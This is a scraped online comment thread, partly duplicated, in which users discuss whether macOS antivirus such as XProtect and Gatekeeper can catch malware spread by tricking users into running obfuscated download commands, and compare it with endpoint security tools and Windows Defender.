Endpoint security software on the Mac, if it's worth the hit to system resources that is, inspect every call to exec and fork that occur in the kernel and also inspect those for known attack vectors, malicious scripts, etc. The one I have installed on my work Mac will kill reverse shell attempts before they are run. Will stop keychain attacks. Infostealing (as they can also get every file system op as they are happening in the kernel).
Gatekeeper and Xprotect are good, but there's only so much they can do.
Antivirus programs will run on PowerShell scripts, VBScript files, JScript files, and all other kinds of automation on Windows.
The screenshots from the article clearly show a permission prompt for a program. Whether that's a binary or a shell script or something else doesn't matter, the infection stage should've been caught by anti malware rather than permission prompts.
Windows Defender does this already. If Apple's AV can't catch this, I think they may be relying on their DRM-as-a-security-measure (signatures, notarisation, etc.) a bit too much.
The article specifically mentions that the methodology here is to trick users into running an obfuscated CLI command…that downloads and runs a binary
wpm|21 days ago
Gatekeeper and Xprotect are good, but there's only so much they can do.
sciencejerk|20 days ago
jeroenhd|20 days ago
The screenshots from the article clearly show a permission prompt for a program. Whether that's a binary or a shell script or something else doesn't matter, the infection stage should've been caught by anti malware rather than permission prompts.
Windows Defender does this already. If Apple's AV can't catch this, I think they may be relying on their DRM-as-a-security-measure (signatures, notarisation, etc.) a bit too much.
tokyobreakfast|21 days ago
Clearly it isn't. XProtect is a joke. It's 2004-era ClamAV level of protection.
sithadmin|21 days ago
GeekyBear|21 days ago
In this case, the user is warned that the command wants to do something dangerous and must manually allow or deny the action.